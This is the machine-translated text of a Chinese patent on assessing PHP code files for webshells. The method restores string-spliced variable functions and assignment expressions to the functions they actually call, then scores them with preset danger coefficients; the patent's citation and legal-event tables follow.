It should be noted that for foregoing each method embodiment, in order to be briefly described, therefore it is all expressed as to a system
The combination of actions of row, but those skilled in the art should know, the present invention is not limited by described sequence of movement
System, because according to the present invention, some steps can use other orders or carry out simultaneously.Secondly, art technology
Personnel should also know that embodiment described in this description belongs to preferred embodiment, involved action and module
Not necessarily necessary to the present invention.
Through the above description of the embodiments, those skilled in the art can be understood that according to above-mentioned implementation
The mode of general hardware platform necessary to the method for the assessments code file security of example can add by software realizes, when
So can also be by hardware, but the former is more preferably embodiment in many cases.Based on such understanding, the present invention
The part that is substantially contributed in other words to prior art of technical scheme can be embodied in the form of software product,
The computer software product is stored in a storage medium (such as ROM/RAM, magnetic disc, CD), including some fingers
Make to cause a station terminal equipment (can be mobile phone, computer, server, or network equipment etc.) to perform sheet
Invent the method described in each embodiment.
Embodiment 2
According to embodiments of the present invention, a kind of dress for being used to implement the method for above-mentioned assessment code file security is additionally provided
Put embodiment.Fig. 4 is a kind of structured flowchart of the device of assessment code file security according to embodiments of the present invention.
As shown in figure 4, the device includes:Parsing module 10, for parsing variable function from code file to be detected
And assignment expression;Recovery module 20, function is directly invoked for being restored according to variable function and assignment expression
With original call function;Evaluation module 30, for by default safety coefficient corresponding with directly invoking function and in advance
If safety coefficient corresponding with original call function the security of code file is assessed.
The technical scheme that the embodiment of the present invention is provided can apply to the webshell Static Detections of PHP scripts.
By the code file write using PHP code is parsed (including:Morphological analysis, semantic analysis), for by
The variable function that character string is spliced is reduced, while directly invokes function and code according to what is restored
Assignment expression in file is carried forward code backtracking, until original call function is restored, to judge code text
Whether webshell common mathematical functions or dangerous function are included in part.Then, then by default with directly invoking function pair
Answer safety coefficient (such as:The harmful grade of common mathematical function or dangerous function) and default and original call function pair
The safety coefficient answered is assessed the security of code file, judge the code file whether be invader (or attack
Person) malice upload webshell files.
Alternatively, Fig. 5 is a kind of structure of device for assessing code file security according to the preferred embodiment of the invention
Block diagram.As shown in figure 5, parsing module 10 can include:Converting unit 100, for carrying out morphology to code file
Analysis, Token sequences are converted to by the character string in code file;Resolution unit 102, for from Token sequences
Variable function and assignment expression are parsed in row.
Alternatively, resolution unit 102 can include:First searches subelement (not shown), for according to default
Each Token in order traversal Token sequences, lookup classification are operator, and value is the first Token of left round parentheses;
Judgment sub-unit (not shown), in the case where finding the first Token, judging and the first Token
Whether the Token of adjacent previous traversal classification is variable;First parsing subelement (not shown), is used for
When judgment sub-unit output is is, it is operator to begin look for classification from the first Token, and value is right round parentheses
2nd Token, and by the parameter sets between the first Token and the 2nd Token and default regular expression phase
In the case of matching somebody with somebody, by current lookup to function be recorded as variable function, return to first and search subelement, until parsing
Go out variable function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point
The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function
Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle
The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation
Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal
Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation
Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the
, will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression
The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions
Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke
Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need
Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent
The matched rule for stating PHP regular expressions is closed, such as:a$b.
Alternatively, resolution unit 102 can include:Second searches subelement (not shown), for according to default
Each Token in order traversal Token sequences, lookup classification are operator, and value is the 3rd Token of equal sign;
Subelement (not shown) is obtained, in the case where finding the 3rd Token, obtaining and the 3rd Token
The Token of adjacent previous traversal, and the Token got value is recorded as the assignment table that current lookup arrives
The variable of assignment is treated up in formula;Second parsing subelement (not shown), for beginning look for class from the 3rd Token
Not Wei operator, value be branch the 4th Token, obtain the 3rd Token and the 4th Token between one or
Multiple Token, and by one or more Token be recorded as current lookup to assignment expression in expression to be calculated
Formula, return to second and search subelement, until parsing assignment expression.
After above-mentioned Tokens arrays are obtained by morphological analysis, it is with obtaining variable function difference:Assignment table
Mainly realized up to formula by equal sign (=).Therefore, can according to preset order (such as:According to lexical analyzer pair
The order that code file is analyzed) successively travel through Tokens arrays in each Token.Due to assignment expression
Equal sign (i.e. "=") is needed to use, therefore, it is necessary first to which it is operator to search classification, and value is equal sign (i.e. "=")
Tokens [i] (equivalent to above-mentioned 3rd Token);Secondly, the Token [i-1] of previous traversal is further obtained,
And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;Then,
It is operator to continue to search for classification, and for the Tokens [i+n] of branch, (equivalent to above-mentioned 4th Token, n is just to value
Integer), and one or more Token between Tokens [i] and Tokens [i+n] are recorded as what current lookup arrived
Expression formula to be calculated in assignment expression.
Alternatively, as shown in figure 5, recovery module 20 can include:First reduction unit 200, for turning from default
Searched in code rule and directly invoke function with what variable function matched;Processing unit 202, for calculating assignment table
The value corresponding with the variable of each assignment expression up in formula, and taken in the variable of each assignment expression with corresponding
Corresponding relation is established between value;Second reduction unit 204, for using default transcoding rule and corresponding relation from direct
Original call function is identified in call function.
Alternatively, as shown in figure 5, evaluation module 30 can include:Reading unit 300, for from default memory block
Read safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function in domain;Calculate single
Member 302, for pair safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function
Summation operation is carried out, obtains safety evaluation result.
According to embodiments of the present invention, another method for being used to implement above-mentioned assessment code file security is additionally provided
Device embodiment.Fig. 6 is the structural frames of another device for assessing code file security according to embodiments of the present invention
Figure.As shown in fig. 6, the device includes:Parsing module 40, for parsing variable from code file to be detected
Function;Recovery module 50, function is directly invoked for being restored according to variable function;Evaluation module 60, for passing through
Default safety coefficient corresponding with directly invoking function is assessed the security of code file.
Assignment expression can be both included in code file to be detected, naturally it is also possible to not comprising assignment expression.
And it is relatively easy for the PHP code file not comprising assignment expression, its assessment mode, Main Basiss preset transcoding
Rule (such as:ASCII character transcoding rule) restored from PHP code file and directly invoke function.Then, then
The security of code file is assessed using default safety coefficient corresponding with directly invoking function.
Embodiment 3
Embodiments of the invention can provide a kind of terminal, and the terminal can be in terminal group
Any one computer terminal.Alternatively, in the present embodiment, above computer terminal can also replace with
The terminal devices such as mobile terminal.
Alternatively, in the present embodiment, above computer terminal can be located in multiple network equipments of computer network
At least one network equipment.
Alternatively, Fig. 7 is a kind of structured flowchart of terminal according to embodiments of the present invention.As shown in fig. 7,
The terminal can include:One or more (one is only shown in figure) processors and memory.
Wherein, memory can be used for storage software program and module, such as the assessment code file in the embodiment of the present invention
Programmed instruction/module corresponding to the method and apparatus of security, processor are stored in the software journey in memory by operation
Sequence and module, so as to perform various function application and data processing, that is, realize above-mentioned assessment code file safety
The method of property.Memory may include high speed random access memory, can also include nonvolatile memory, such as one or
Multiple magnetic storage devices, flash memory or other non-volatile solid state memories.In some instances, memory can
Further comprise that relative to the remotely located memory of processor, these remote memories network connection to end can be passed through
End.The example of above-mentioned network includes but is not limited to internet, intranet, LAN, mobile radio communication and its group
Close.
Processor can call the information and application program of memory storage by transmitting device, to perform following step:
S1:Variable function and assignment expression are parsed from code file to be detected;
S2:Restored according to variable function and assignment expression and directly invoke function and original call function;
S3:By default safety coefficient corresponding with directly invoking function and default corresponding with original call function
Safety coefficient is assessed the security of code file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Morphological analysis is carried out to code file,
Character string in code file is converted into Token sequences;Variable function and tax are parsed from Token sequences
Value expression.
Optionally, above-mentioned processor can also carry out the program code of following steps:Finding step:According to preset order
Each Token in Token sequences is traveled through, lookup classification is operator, and value is the first Token of left round parentheses;
Judgment step:In the case where finding the first Token, the previous traversal adjacent with the first Token is judged
Whether Token classification is variable;If it is, it is operator to begin look for classification from the first Token, value is
2nd Token of right round parentheses, and by the parameter sets between the first Token and the 2nd Token and default canonical
In the case that expression formula matches, by current lookup to function be recorded as variable function, return to finding step, until
Parse variable function.
Optionally, above-mentioned processor can also carry out the program code of following steps:Finding step:According to preset order
Each Token in Token sequences is traveled through, lookup classification is operator, and value is the 3rd Token of equal sign;Obtain
Step:In the case where finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained,
And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;From the 3rd
It is operator that Token, which begins look for classification, and value is the 4th Token of branch, obtains the 3rd Token and the 4th Token
Between one or more Token, and by one or more Token be recorded as current lookup to assignment expression in
Expression formula to be calculated, finding step is returned to, until parsing assignment expression.
Optionally, above-mentioned processor can also carry out the program code of following steps:From default transcoding rule search with
What variable function matched directly invokes function;Calculate corresponding with the variable of each assignment expression in assignment expression
Value, and establish corresponding relation between the variable of each assignment expression and corresponding value;Using default transcoding
Rule and corresponding relation identify original call function from directly invoking in function.
Optionally, above-mentioned processor can also carry out the program code of following steps:Read from default storage region and straight
Connect safety coefficient corresponding to call function and safety coefficient corresponding with original call function;Pair with directly invoke function
Corresponding safety coefficient and safety coefficient corresponding with original call function carry out summation operation, obtain safety evaluation
As a result.
As another embodiment of the present invention, processor can also call memory storage by transmitting device
Information and application program, to perform following step:
S1:Variable function is parsed from code file to be detected;
S2:Restored according to variable function and directly invoke function;
S3:The security of code file is assessed by default safety coefficient corresponding with directly invoking function.
Using the embodiment of the present invention, the side of variable function and assignment expression is parsed from code file to be detected
Formula, restored according to variable function and assignment expression directly invoke function and original call function and by it is default with
Safety coefficient corresponding to function and default safety coefficient corresponding with original call function are directly invoked to code file
Security is assessed, it is achieved thereby that the detection efficiency of variable function type webshell code files is improved, lifting inspection
Survey the technique effect of result accuracy, so solve provided in correlation technique for webshell code files
Safety detection scheme detection efficiency is relatively low, the not high technical problem of accuracy.
It will appreciated by the skilled person that the structure shown in Fig. 7 is only to illustrate, terminal can also be
Smart mobile phone (such as Android phone, iOS mobile phones), tablet personal computer, applause computer and mobile internet device
The terminal device such as (Mobile Internet Devices, referred to as MID), PAD.Fig. 7 its not to above-mentioned electronics
The structure of device causes to limit.For example, terminal may also include the component more or less than shown in Fig. 7
(such as network interface, display device), or there is the configuration different from shown in Fig. 7.
One of ordinary skill in the art will appreciate that all or part of step in the various methods of above-described embodiment is can be with
Completed by program come command terminal device-dependent hardware, the program can be stored in a computer-readable storage medium
In matter, storage medium can include:Flash disk, read-only storage (Read-Only Memory, referred to as ROM),
Random access device (Random Access Memory, referred to as RAM), disk or CD etc..
Embodiment 4
Embodiments of the invention additionally provide a kind of storage medium.Alternatively, in the present embodiment, above-mentioned storage medium
It can be used for preserving the program code performed by the method for the assessment code file security that above-described embodiment one is provided.
Alternatively, in the present embodiment, above-mentioned storage medium can be located in computer network Computer terminal group
In any one terminal, or in any one mobile terminal in mobile terminal group.
Alternatively, in the present embodiment, storage medium is arranged to the program code that storage is used to perform following steps:
S1:Variable function and assignment expression are parsed from code file to be detected;
S2:Restored according to variable function and assignment expression and directly invoke function and original call function;
S3:By default safety coefficient corresponding with directly invoking function and default corresponding with original call function
Safety coefficient is assessed the security of code file.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:To code text
Part carries out morphological analysis, and the character string in code file is converted into Token sequences;Parsed from Token sequences
Go out variable function and assignment expression.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Finding step:
Each Token in Token sequences is traveled through according to preset order, lookup classification is operator, and value is left round parentheses
The first Token;Judgment step:In the case where finding the first Token, judge adjacent with the first Token
Whether the Token of previous traversal classification is variable;If it is, classification is begun look for as behaviour from the first Token
According with, value is the 2nd Token of right round parentheses, and by the parameter sets between the first Token and the 2nd Token
In the case of matching with default regular expression, by current lookup to function be recorded as variable function, return is looked into
Step is looked for, until parsing variable function.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Finding step:
Each Token in Token sequences is traveled through according to preset order, lookups classification is operator, and value is the of equal sign
Three Token;Obtaining step:In the case where finding the 3rd Token, obtain adjacent with the 3rd Token previous
The Token of individual traversal, and by the Token got value be recorded as current lookup to assignment expression in wait to assign
The variable of value;It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, obtains the
One or more Token between three Token and the 4th Token, and one or more Token are recorded as currently
Expression formula to be calculated in the assignment expression found, finding step is returned to, until parsing assignment expression.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Turn from default
Searched in code rule and directly invoke function with what is matched in variable function;Calculate in assignment expression with each assignment
Value corresponding to the variable of expression formula, and between the variable of each assignment expression and corresponding value foundation it is corresponding close
System;Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Deposited from default
Read safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function in storage area domain;It is right
Safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function carry out summation operation,
Obtain safety evaluation result.
Alternatively, in the alternative scheme of the present embodiment, storage medium is arranged to storage and is used to perform following steps
Program code:
S1:Variable function is parsed from code file to be detected;
S2:Restored according to variable function and directly invoke function;
S3:The security of code file is assessed by default safety coefficient corresponding with directly invoking function.
The embodiments of the present invention are for illustration only, do not represent the quality of embodiment.
In the above embodiment of the present invention, the description to each embodiment all emphasizes particularly on different fields, and does not have in some embodiment
The part of detailed description, it may refer to the associated description of other embodiment.
In several embodiments provided herein, it should be understood that disclosed technology contents, can be by other
Mode realize.Wherein, device embodiment described above is only schematical, such as the division of the unit,
Only a kind of division of logic function, can there are other dividing mode, such as multiple units or component when actually realizing
Another system can be combined or be desirably integrated into, or some features can be ignored, or do not perform.It is another, institute
Display or the mutual coupling discussed or direct-coupling or communication connection can be by some interfaces, unit or mould
The INDIRECT COUPLING of block or communication connection, can be electrical or other forms.
The unit illustrated as separating component can be or may not be physically separate, show as unit
The part shown can be or may not be physical location, you can with positioned at a place, or can also be distributed to
On multiple NEs.Some or all of unit therein can be selected to realize the present embodiment according to the actual needs
The purpose of scheme.
In addition, each functional unit in each embodiment of the present invention can be integrated in a processing unit, can also
That unit is individually physically present, can also two or more units it is integrated in a unit.It is above-mentioned integrated
Unit can both be realized in the form of hardware, can also be realized in the form of SFU software functional unit.
If the integrated unit realized in the form of SFU software functional unit and as independent production marketing or in use,
It can be stored in a computer read/write memory medium.Based on such understanding, technical scheme essence
On all or part of the part that is contributed in other words to prior art or the technical scheme can be with software product
Form is embodied, and the computer software product is stored in a storage medium, including some instructions are causing one
Platform computer equipment (can be personal computer, server or network equipment etc.) performs each embodiment institute of the present invention
State all or part of step of method.And foregoing storage medium includes:USB flash disk, read-only storage (ROM, Read-Only
Memory), random access memory (RAM, Random Access Memory), mobile hard disk, magnetic disc or CD
Etc. it is various can be with the medium of store program codes.
Described above is only the preferred embodiment of the present invention, it is noted that for the ordinary skill people of the art
For member, under the premise without departing from the principles of the invention, some improvements and modifications can also be made, these are improved and profit
Decorations also should be regarded as protection scope of the present invention.
Claims (14)
- A kind of 1. method for assessing code file security, it is characterised in that including:Variable function and assignment expression are parsed from code file to be detected;Restored according to the variable function and the assignment expression and directly invoke function and original call function;By default the corresponding safety coefficient of function and the default and original call letter are directly invoked with described Safety coefficient corresponding to number is assessed the security of the code file.
- 2. according to the method for claim 1, it is characterised in that the variable letter is parsed from the code file Several and described assignment expression includes:Morphological analysis is carried out to the code file, the character string in the code file is converted into word Token sequences;The variable function and the assignment expression are parsed from the Token sequences.
- 3. according to the method for claim 2, it is characterised in that parse the variable from the Token sequences Function includes:Finding step:Each Token in the Token sequences is traveled through according to preset order, searching classification is Operator, value are the first Token of left round parentheses;Judgment step:In the case where finding the first Token, judge adjacent with the first Token The Token classification of previous traversal whether be variable;If it is, it is operator to begin look for classification from the first Token, value is the of right round parentheses Two Token, and by the parameter sets between the first Token and the 2nd Token and default canonical In the case that expression formula matches, by current lookup to function be recorded as variable function, return and described search step Suddenly, until parsing the variable function.
- 4. according to the method for claim 2, it is characterised in that parse the assignment from the Token sequences Expression formula includes:Finding step:Each Token in the Token sequences is traveled through according to preset order, searching classification is Operator, value are the 3rd Token of equal sign;Obtaining step:In the case where finding the 3rd Token, obtain adjacent with the 3rd Token Previous traversal Token, and the Token got value is recorded as the assignment table that current lookup arrives The variable of assignment is treated up in formula;It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, is obtained One or more Token between 3rd Token and the 4th Token, and will be one or more Individual Token be recorded as the current lookup to assignment expression in expression formula to be calculated, return to the lookup Step, until parsing the assignment expression.
- 5. method according to any one of claim 1 to 4, it is characterised in that according to the variable function and institute State assignment expression and restore and described directly invoke function and the original call function and include:From default transcoding rule search with the variable function match described in directly invoke function;Value corresponding with the variable of each assignment expression in the assignment expression is calculated, and in each tax Corresponding relation is established between the variable of value expression and corresponding value;The original is identified from described directly invoke using the regular and described corresponding relation of the default transcoding in function Beginning call function.
- 6. according to the method for claim 1, it is characterised in that by with it is described directly invoke function it is corresponding safety Coefficient and safety coefficient corresponding with the original call function are assessed the security of the code file Including:From default storage region read with it is described directly invoke the corresponding safety coefficient of function and with the original tune The safety coefficient corresponding to function;Pair directly invoke the corresponding safety coefficient of function and safety corresponding with the original call function with described Coefficient carries out summation operation, obtains safety evaluation result.
- A kind of 7. method for assessing code file security, it is characterised in that including:Variable function is parsed from code file to be detected;Restored according to the variable function and directly invoke function;The security of the code file is entered with the function corresponding safety coefficient that directly invokes by default Row is assessed.
- A kind of 8. device for assessing code file security, it is characterised in that including:Parsing module, for parsing variable function and assignment expression from code file to be detected;Recovery module, for restored according to the variable function and the assignment expression directly invoke function and Original call function;Evaluation module, for by it is default with it is described directly invoke the corresponding safety coefficient of function and it is default with Safety coefficient corresponding to the original call function is assessed the security of the code file.
- 9. device according to claim 8, it is characterised in that the parsing module includes:Converting unit, for carrying out morphological analysis to the code file, by the character sequence in the code file Row are converted to word Token sequences;Resolution unit, for parsing the variable function and assignment expression from the Token sequences Formula.
- 10. device according to claim 9, it is characterised in that the resolution unit includes:First searches subelement, for traveling through each Token in the Token sequences according to preset order, Lookup classification is operator, and value is the first Token of left round parentheses;Judgment sub-unit, in the case where finding the first Token, judging and the first Token Whether the Token of adjacent previous traversal classification is variable;First parsing subelement, for when judgment sub-unit output is is, being opened from the first Token It is operator to begin to search classification, value for right round parentheses the 2nd Token, and by the first Token and institute State in the case that parameter sets between the 2nd Token match with default regular expression, by current lookup To function be recorded as variable function, return to described first and search subelement, until parsing the variable function.
- 11. device according to claim 9, it is characterised in that the resolution unit includes:Second searches subelement, for traveling through each Token in the Token sequences according to preset order, Lookup classification is operator, and value is the 3rd Token of equal sign;Subelement is obtained, in the case where finding the 3rd Token, obtaining and the 3rd Token The Token of adjacent previous traversal, and the Token got value is recorded as the tax that current lookup arrives The variable of assignment is treated in value expression;Second parsing subelement, it is operator for beginning look for classification from the 3rd Token, value is point Number the 4th Token, obtain one or more Token between the 3rd Token and the 4th Token, And by one or more of Token be recorded as the current lookup to assignment expression in expression to be calculated Formula, return to described second and search subelement, until parsing the assignment expression.
- 12. the device according to any one of claim 8 to 11, it is characterised in that the recovery module includes:First reduction unit, for searched from default transcoding rule match with the variable function it is described straight Connect call function;Processing unit, for calculating corresponding with the variable of each assignment expression in the assignment expression take Value, and establish corresponding relation between the variable of each assignment expression and corresponding value;Second reduction unit, for being directly invoked using the regular and described corresponding relation of the default transcoding from described The original call function is identified in function.
- 13. device according to claim 8, it is characterised in that the evaluation module includes:Reading unit, for from default storage region read with it is described directly invoke the corresponding safety coefficient of function with And safety coefficient corresponding with the original call function;Computing unit, for pair with it is described directly invoke the corresponding safety coefficient of function and with the original call Safety coefficient corresponding to function carries out summation operation, obtains safety evaluation result.
- A kind of 14. device for assessing code file security, it is characterised in that including:Parsing module, for parsing variable function from code file to be detected;Recovery module, function is directly invoked for being restored according to the variable function;Evaluation module, for by it is default with the corresponding safety coefficient of function that directly invokes to the code The security of file is assessed.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610282740.8A CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610282740.8A CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Publications (2)
Publication Number | Publication Date |
---|---|
CN107341399A true CN107341399A (en) | 2017-11-10 |
CN107341399B CN107341399B (en) | 2020-09-04 |
Family
ID=60221962
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201610282740.8A Active CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN107341399B (en) |
Cited By (11)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
CN108959071A (en) * | 2018-06-14 | 2018-12-07 | 湖南鼎源蓝剑信息科技有限公司 | A kind of detection method and system of the PHP deformation webshell based on RASP |
CN109408113A (en) * | 2018-09-03 | 2019-03-01 | 平安普惠企业管理有限公司 | A kind of code text processing method, system and terminal device |
CN109660499A (en) * | 2018-09-13 | 2019-04-19 | 阿里巴巴集团控股有限公司 | It attacks hold-up interception method and device, calculate equipment and storage medium |
CN110413284A (en) * | 2019-08-06 | 2019-11-05 | 腾讯科技(深圳)有限公司 | Morphology analysis methods, device, computer equipment and storage medium |
CN110795731A (en) * | 2019-10-09 | 2020-02-14 | 新华三信息安全技术有限公司 | Page detection method and device |
CN111368304A (en) * | 2020-03-31 | 2020-07-03 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN112800427A (en) * | 2021-04-08 | 2021-05-14 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN113032779A (en) * | 2021-02-04 | 2021-06-25 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN114422148A (en) * | 2022-03-25 | 2022-04-29 | 北京长亭未来科技有限公司 | Webshell framework depicting and detecting method, device and equipment |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101436128A (en) * | 2007-11-16 | 2009-05-20 | 北京邮电大学 | Software test case automatic generating method and system |
CN102955914A (en) * | 2011-08-19 | 2013-03-06 | 百度在线网络技术(北京)有限公司 | Method and device for detecting security flaws of source files |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
-
2016
- 2016-04-29 CN CN201610282740.8A patent/CN107341399B/en active Active
Patent Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101436128A (en) * | 2007-11-16 | 2009-05-20 | 北京邮电大学 | Software test case automatic generating method and system |
CN102955914A (en) * | 2011-08-19 | 2013-03-06 | 百度在线网络技术(北京)有限公司 | Method and device for detecting security flaws of source files |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
Non-Patent Citations (1)
Title |
---|
TRUONG DINH TU等: "《Evil-hunter:a novel web shell detection system based on scoring scheme》", 《JOURNAL OF SOUTHEAST UNIVERSITY (ENGLISH EDITION)》 * |
Cited By (19)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
CN108459962B (en) * | 2018-01-23 | 2021-09-03 | 平安普惠企业管理有限公司 | Code normalization detection method and device, terminal equipment and storage medium |
CN108959071A (en) * | 2018-06-14 | 2018-12-07 | 湖南鼎源蓝剑信息科技有限公司 | A kind of detection method and system of the PHP deformation webshell based on RASP |
CN109408113A (en) * | 2018-09-03 | 2019-03-01 | 平安普惠企业管理有限公司 | A kind of code text processing method, system and terminal device |
CN109660499A (en) * | 2018-09-13 | 2019-04-19 | 阿里巴巴集团控股有限公司 | It attacks hold-up interception method and device, calculate equipment and storage medium |
CN109660499B (en) * | 2018-09-13 | 2021-07-27 | 创新先进技术有限公司 | Attack interception method and device, computing equipment and storage medium |
CN110413284A (en) * | 2019-08-06 | 2019-11-05 | 腾讯科技(深圳)有限公司 | Morphology analysis methods, device, computer equipment and storage medium |
CN110413284B (en) * | 2019-08-06 | 2023-10-17 | 腾讯科技(深圳)有限公司 | Lexical analysis method, lexical analysis device, computer equipment and storage medium |
CN110795731A (en) * | 2019-10-09 | 2020-02-14 | 新华三信息安全技术有限公司 | Page detection method and device |
CN110795731B (en) * | 2019-10-09 | 2022-02-25 | 新华三信息安全技术有限公司 | Page detection method and device |
CN111368304A (en) * | 2020-03-31 | 2020-07-03 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN111368304B (en) * | 2020-03-31 | 2022-07-05 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN113032779A (en) * | 2021-02-04 | 2021-06-25 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN113032779B (en) * | 2021-02-04 | 2024-01-02 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN112800427B (en) * | 2021-04-08 | 2021-09-28 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN112800427A (en) * | 2021-04-08 | 2021-05-14 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN114422148A (en) * | 2022-03-25 | 2022-04-29 | 北京长亭未来科技有限公司 | Webshell framework depicting and detecting method, device and equipment |
CN114422148B (en) * | 2022-03-25 | 2024-04-09 | 北京长亭未来科技有限公司 | Framework depiction and detection method, device and equipment of Webshell |
Also Published As
Publication number | Publication date |
---|---|
CN107341399B (en) | 2020-09-04 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN107341399A (en) | Assess the method and device of code file security | |
CN103559235B (en) | A kind of online social networks malicious web pages detection recognition methods | |
CN109005145A (en) | A kind of malice URL detection system and its method extracted based on automated characterization | |
CN107220386A (en) | Information-pushing method and device | |
CN107659570A (en) | Webshell detection methods and system based on machine learning and static and dynamic analysis | |
CN110266647A (en) | It is a kind of to order and control communication check method and system | |
CN104156490A (en) | Method and device for detecting suspicious fishing webpage based on character recognition | |
CN106961419A (en) | WebShell detection methods, apparatus and system | |
CN106874253A (en) | Recognize the method and device of sensitive information | |
CN107704453A (en) | A kind of word semantic analysis, word semantic analysis terminal and storage medium | |
CN113098887A (en) | Phishing website detection method based on website joint characteristics | |
CN108134784A (en) | web page classification method and device, storage medium and electronic equipment | |
CN106572117A (en) | Method and apparatus for detecting WebShell file | |
CN110427755A (en) | A kind of method and device identifying script file | |
CN112464666B (en) | Unknown network threat automatic discovery method based on hidden network data | |
CN106599160A (en) | Content rule base management system and encoding method thereof | |
CN111181922A (en) | Fishing link detection method and system | |
CN110191096A (en) | A kind of term vector homepage invasion detection method based on semantic analysis | |
CN111866004A (en) | Security assessment method, apparatus, computer system, and medium | |
CN109918648B (en) | Rumor depth detection method based on dynamic sliding window feature score | |
CN115757991A (en) | Webpage identification method and device, electronic equipment and storage medium | |
CN108920909B (en) | Counterfeit mobile application program discrimination method and system | |
CN110020161B (en) | Data processing method, log processing method and terminal | |
CN101470752A (en) | Search engine method based on keyword resolution scheduling | |
CN106611029A (en) | Method and device for improving site search efficiency in website |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |